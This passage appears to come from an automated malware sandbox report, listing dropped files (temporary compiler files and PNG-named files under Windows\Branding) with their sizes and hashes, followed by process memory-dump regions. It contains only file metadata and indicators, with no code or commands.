e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFE0E.tmp

Filesize
652B

MD5
633401f06867b0c88824897882e375ab

SHA1
0b99b909d79063286e1ea1ea55d2b4ae87d8cbb0

SHA256
fad9f9183d54986330f5ebdc04a7b82e5545755e4c4a12c402265bddd56781e4

SHA512
1b2539d7edc3c8ecd0509b81019ad32ab64fa46b1ded4ee10ff1d5dff17a57667b4bc903f764bc6ab43fc6986d7440560a344f7b2345c29295b9356e737066bf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mri3krfg.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mri3krfg.cmdline

Filesize
309B

MD5
f9da185669adaebdde1387cf8f9e43c0

SHA1
52f51ba51f2af87c7cf4f18eca1a5e7f632ff9b8

SHA256
7a53e143d777adbf65f0823e809ad99fc0216432569124b1ab41733e8f5d32eb

SHA512
86fc7cf35eb481c9cb1ccd2a6cb105d41fba9eb14aedd931e4ed6d6ae3e6286796b2be84d57290b882a7c66c89d2fba22ff7fb7c1fce84087167698ae6723ad3

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
b110f38845e18a04ab59a7d8a134ef40

SHA1
8119030034e6fbe62d875e824b5233c1f29d61a0

SHA256
1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea

SHA512
80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5768a809b9fcbff117dffa8cbf2e8852

SHA1
a056e76d15bc7509d0361175b2ae4ba348460cd6

SHA256
8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094

SHA512
99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

Download Submit
memory/2596-16-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-59-0x000007FEED4DE000-0x000007FEED4DF000-memory.dmp

Filesize
4KB

Download
memory/2596-15-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-17-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-62-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-14-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2596-33-0x0000000002B00000-0x0000000002B08000-memory.dmp

Filesize
32KB

Download
memory/2596-13-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2596-12-0x000007FEED4DE000-0x000007FEED4DF000-memory.dmp

Filesize
4KB

Download
memory/2596-37-0x000000001B560000-0x000000001B592000-memory.dmp

Filesize
200KB

Download
memory/2596-38-0x000000001B560000-0x000000001B592000-memory.dmp

Filesize
200KB

Download
memory/2596-61-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-60-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-18-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-57-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-58-0x000007FEED220000-0x000007FEEDBBD000-memory.dmp

Filesize
9.6MB

Download
memory/2696-55-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-54-0x000007FEF5BC3000-0x000007FEF5BC4000-memory.dmp

Filesize
4KB

Download
memory/2696-5-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-0-0x000007FEF5BC3000-0x000007FEF5BC4000-memory.dmp

Filesize
4KB

Download
memory/2696-4-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-3-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-2-0x000007FEF5BC0000-0x000007FEF65AC000-memory.dmp

Filesize
9.9MB

Download
memory/2696-1-0x0000000041BF0000-0x0000000042016000-memory.dmp

Filesize
4.1MB

Download